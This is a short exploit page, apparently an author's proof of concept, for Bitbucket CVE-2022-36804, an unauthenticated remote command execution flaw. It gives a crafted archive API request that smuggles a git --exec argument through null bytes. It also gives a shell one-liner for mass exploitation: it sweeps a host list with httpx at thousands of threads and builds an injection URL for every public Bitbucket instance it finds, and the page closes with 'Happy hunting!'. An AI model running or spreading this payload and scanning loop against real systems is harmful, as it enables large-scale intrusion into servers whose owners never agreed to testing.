Share
## https://sploitus.com/exploit?id=CCB6354A-0595-55E1-8DF9-BEF3891E6947
# CVE-2022-36804-POC ๐ท๏ธ
Bitbucket CVE-2022-36804 unauthenticated remote command execution
## Exploitation
Find publicly visible repositories - example.com/repos?visibility=public
`/rest/api/latest/projects/{project-path}/archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60id%60%00--remote=origin`
## Mass Exploitation
``
for url in $(cat hosts.txt | httpx -follow-redirects -title -path /repos?visibility=public -match-string "repository-container" -threads 9500 | grep Bitbucket |awk '{print $1}');do echo $url|sed 's/\/repos?visibility=public//g'|tr -d \\n;curl -s -k "$url" | grep -Po '(/projects/)(?!.*\1).*'|grep -o "/projects/.*/browse"|sed 's/browse//g'|awk '{print "/rest/api/latest"$1"archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60id%60%00--remote=origin"}';done
``
Visit crafted URLs :)
Happy hunting! ๐บ
[Twitter](https://twitter.com/milanshiftsec)
[LinkedIn](https://www.linkedin.com/in/milan-jovic-sec/)